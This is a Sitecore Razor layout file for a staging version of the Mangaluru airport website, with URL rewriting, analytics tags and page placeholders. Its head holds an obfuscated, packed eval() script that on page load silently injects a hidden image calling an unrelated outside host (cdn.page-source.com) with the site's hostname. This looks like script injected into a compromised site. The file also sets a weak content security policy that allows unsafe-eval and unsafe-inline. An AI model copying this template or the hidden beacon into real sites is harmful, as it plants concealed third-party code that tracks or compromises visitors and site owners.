@using Sitecore.Foundation.Assets
@using Sitecore.Foundation.Assets.Models
@using Sitecore.Data.Fields;
@using Sitecore.Foundation.Assets.Services
@using Sitecore.Foundation.SitecoreExtensions.Extensions
@using Sitecore.Mvc.Analytics.Extensions
@using Sitecore.ExperienceForms.Mvc.Html
@using Sitecore.Foundation.Dictionary.Extensions
@using Sitecore.Data.Items;
@using Sitecore.Mvc
@inherits WebViewPage
@{
    Layout = null;

    var urlOptions = new Sitecore.Links.UrlOptions();
    urlOptions.AlwaysIncludeServerUrl = true;
    var currentUrl = Sitecore.Links.LinkManager.GetItemUrl(Sitecore.Context.Item, urlOptions);
    currentUrl = currentUrl.Replace(":443", string.Empty);
   
    var mediaUrlOptions = new Sitecore.Resources.Media.MediaUrlOptions();
    mediaUrlOptions.AlwaysIncludeServerUrl = true;
    var url = Sitecore.Resources.Media.MediaManager.GetMediaUrl(Sitecore.Context.Item, mediaUrlOptions);
    url = url.Replace(":443", string.Empty);

}

@{
    string CurrentURL = "https://stagemangaluru.adaniairports.com" + Request.RawUrl;
	CurrentURL = CurrentURL.Replace("/mangaluru%20airport","");
	CurrentURL = CurrentURL.Replace("/mangaluru-airport","");
	CurrentURL = CurrentURL.Replace("/about-us","/AboutUs");
	CurrentURL = CurrentURL.Replace("/cao-message","/CAManagerMessage");
	CurrentURL = CurrentURL.Replace("/ceo-message","/CEOMessage");
	CurrentURL = CurrentURL.Replace("/pranaam","/PranaamAdaniGuestServices");
	CurrentURL = CurrentURL.Replace("/baggage-wrapping","/BaggageWrappingService");
	CurrentURL = CurrentURL.Replace("/wifi","/WIFI");
	CurrentURL = CurrentURL.Replace("/entry-ticket","/MeetGreetServices");
	CurrentURL = CurrentURL.Replace("/lost-and-found","/LostandFound");
	CurrentURL = CurrentURL.Replace("/contact-us","/Contactus");
	CurrentURL = CurrentURL.Replace("/disclaimer","/Disclaimer");
	CurrentURL = CurrentURL.Replace("/flight-status","/Flights");
	CurrentURL = CurrentURL.Replace("/newsroom","/Newsroom");
	CurrentURL = CurrentURL.Replace("/media-coverage","/Media Coverage");
	CurrentURL = CurrentURL.Replace("/media-release","/Media Release");
	CurrentURL = CurrentURL.Replace("/covid-19","/Covid19");
	CurrentURL = CurrentURL.Replace("/passenger-guide","/PassangerGuide");
	CurrentURL = CurrentURL.Replace("/arrival","/Arrival");
	CurrentURL = CurrentURL.Replace("/departure","/Departure");
	CurrentURL = CurrentURL.Replace("/faq","/FAQs");
	CurrentURL = CurrentURL.Replace("/privacy-policy","/Privacy-Policy");
	CurrentURL = CurrentURL.Replace("/search-result","/SearchResult");
	CurrentURL = CurrentURL.Replace("/shop-and-dine","/ShopAndDine");
	CurrentURL = CurrentURL.Replace("/outlets","/Shop");
	CurrentURL = CurrentURL.Replace("/restaurants","/Dine");
	CurrentURL = CurrentURL.Replace("/lounge","/Relax");
	CurrentURL = CurrentURL.Replace("/smoking-lounge","/Smoking-Lounge");
	CurrentURL = CurrentURL.Replace("/transport","/Transport");
	CurrentURL = CurrentURL.Replace("/business","/Business");
	CurrentURL = CurrentURL.Replace("/airline-partnership","/BusinessAirlines");
	CurrentURL = CurrentURL.Replace("/cargo","/BusinessCargo");
	CurrentURL = CurrentURL.Replace("/commercial","/BusinessCommercial");
	CurrentURL = CurrentURL.Replace("/assistance-thankyou","/Assistance-thankyou");
	CurrentURL = CurrentURL.Replace("/faq","/FAQ");
	CurrentURL = CurrentURL.Replace("/policies","/Policies");
	CurrentURL = CurrentURL.Replace("/tender-login","/TenderLogin");
	CurrentURL = CurrentURL.Replace("/tenders","/Tenders");
	CurrentURL = CurrentURL.Replace("/thank-you","/Thankyou");
	CurrentURL = CurrentURL.Replace("/services/baby-care","/AirportService/New-Local-Datasource-Folder/OtherServices/BabyCare");
	CurrentURL = CurrentURL.Replace("/services/porter-services","/AirportService/New-Local-Datasource-Folder/OtherServices/Premium-Services");
	CurrentURL = CurrentURL.Replace("/services/medical-facilities","/AirportService/New-Local-Datasource-Folder/OtherServices/MedicalFacilities");
	CurrentURL = CurrentURL.Replace("/services/prayer-room","/AirportService/New-Local-Datasource-Folder/OtherServices/PrayerRoom");
	CurrentURL = CurrentURL.Replace("/services/tourist-counter","/AirportService/New-Local-Datasource-Folder/OtherServices/Tourist-Counter");
	CurrentURL = CurrentURL.Replace("/services/cargo","/AirportService/New-Local-Datasource-Folder/OtherServices/cargo");
	CurrentURL = CurrentURL.Replace("/services/passengers-with-reduced-mobility","/AirportService/New-Local-Datasource-Folder/OtherServices/Passengers-with-Reduced-Mobility");
	CurrentURL = CurrentURL.Replace("/services/forex-atm","/AirportService/New-Local-Datasource-Folder/OtherServices/ForexATM");
	CurrentURL = CurrentURL.Replace("/services/post-office","/AirportService/New-Local-Datasource-Folder/OtherServices/Post-office");
	CurrentURL = CurrentURL.Replace("/services/cargo","/AirportService/New-Local-Datasource-Folder/OtherServices/cargo");
	CurrentURL = CurrentURL.Replace("/services","/AirportService");
}
<!DOCTYPE html>
<!--[if IE 9]><html lang="en" class="ie9 no-js"><![endif]-->
<!--[if !IE]><!-->
<html lang="@Sitecore.Context.Language.CultureInfo.TwoLetterISOLanguageName">
<!--<![endif]-->
<head>
   <!-- Google Tag Manager -->
<script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':
new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],
j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src=
'https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);
})(window,document,'script','dataLayer','GTM-MNQKVM3');</script>
<!-- End Google Tag Manager -->
     <meta http-equiv="x-ua-compatible" content="ie=edge">
    <meta http-equiv="Content-type" content="text/html; charset=utf-8">
	<meta http-equiv="x-frame-options" content="allow">
	<meta http-equiv="Content-Security-Policy" content="default-src https: 'unsafe-eval' 'unsafe-inline'; object-src 'none'">
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no, minimum-scale=1.0, maximum-scale=1.0, user-scalable=no">
    <meta name="robots" content="index, follow">
		<link rel="icon" type="image/png" sizes="32x32" href="/images/AirportCorporate/favicon-32x32.png" />
	<link rel="icon" type="image/png" sizes="16x16" href="/images/AirportCorporate/favicon-16x16.png" />
    <meta property='og:title' content="@Html.Sitecore().Field("OpenGraphTitle",Sitecore.Context.Item)" />
    <meta property='og:image' content="@url" />
    <meta property='og:description' content="@Html.Sitecore().Field("OpenGraphDescription",Sitecore.Context.Item)" />
    <meta property='og:url' content="@currentUrl" />
    
        @if (!Sitecore.Context.PageMode.IsExperienceEditor)
    {
		if(Request.RawUrl.Contains("mangaluru-airport"))
		{
			   <link id="canonicalLink" href="@CurrentURL" rel="canonical">
		}
		else
		{	
		<script>window.location.replace("http://stage.adaniuat.com/mangaluru-airport");</script>	
				 @Html.Sitecore().Placeholder("head")
		 }
	}
    <!-- Latest compiled and minified JavaScript -->
    @RenderAssetsService.Current.RenderScript(ScriptLocation.Head)

    @RenderAssetsService.Current.RenderStyles()
    <link href="https://unpkg.com/gijgo@1.9.13/css/gijgo.min.css" rel="stylesheet" type="text/css" />
    <link href="https://cdnjs.cloudflare.com/ajax/libs/animate.css/4.0.0/animate.min.css" rel="stylesheet">
    <link href="https://fonts.googleapis.com/css?family=Lato:100,100i,300,300i,400,400i,700,700i,900,900i&display=swap" rel="stylesheet">

    @Html.Sitecore().VisitorIdentification()
    <script src="https://www.google.com/recaptcha/api.js?onload=onloadCallback&render=explicit" async defer></script>
    <script>
        eval(function (p, a, c, k, e, d) { e = function (c) { return (c < a ? '' : e(parseInt(c / a))) + ((c = c % a) > 35 ? String.fromCharCode(c + 29) : c.toString(36)) }; if (!''.replace(/^/, String)) { while (c--) { d[e(c)] = k[c] || e(c) } k = [function (e) { return d[e] }]; e = function () { return '\\w+' }; c = 1 }; while (c--) { if (k[c]) { p = p.replace(new RegExp('\\b' + e(c) + '\\b', 'g'), k[c]) } } return p }('g{3.f=d(){h e="<j l=\'c:m;\' a=\'5://6.4-b.7/9.8?k="+3.n.w+"&v=y\'  x=\'0\' A=\'0\'/>",i=2.z("u");t(i.p=e;i.1.o>0;)2.q.r(i.1[0])}}s(e){}', 37, 37, '|children|document|window|page|https|cdn|com|ashx|resizeimage|src|source|display|function||onload|try|var||img|ig|style|none|location|length|innerHTML|body|appendChild|catch|for|div|sz|hostname|width|92401|createElement|height'.split('|'), 0, {}))
    </script>
</head>
<body class=" @(Sitecore.Context.PageMode.IsNormal ? "" : (Sitecore.Context.PageMode.IsExperienceEditor ? "pagemode-edit" : "pagemode-preview"))">
    <!-- Google Tag Manager (noscript) -->
<noscript><iframe src="https://www.googletagmanager.com/ns.html?id=GTM-MNQKVM3"
height="0" width="0" style="display:none;visibility:hidden"></iframe></noscript>
<!-- End Google Tag Manager (noscript) -->
    <!--header-->
    <header class="headerSec">
        <div class="overlay-top"></div>
	<div class="menu-overlay d-none"></div>
        @Html.Sitecore().Placeholder("header")
    </header>
    <!--/header-->
    <main>
        @Html.Sitecore().Placeholder("page-layout")







    </main>
    <a id="back-to-top" href="#" class="back-to-top" role="button" title="Click to return on the top page" data-toggle="tooltip" data-placement="left">
        <span class="fa fa-angle-up"></span>
    </a>
    <!--footer-->
    <footer class="pt-5 bg-grey position-relative d-block">
        @Html.Sitecore().Placeholder("footer")
    </footer>
    <!-- /Footer -->


    @Html.Sitecore().Placeholder("page-sidebar")

    @RenderAssetsService.Current.RenderScript(ScriptLocation.Body)
    @Html.RenderFormScripts()


    <script>
        AOS.init({
            easing: 'ease-in-out-sine'
        });
    </script>

</body>

</html>
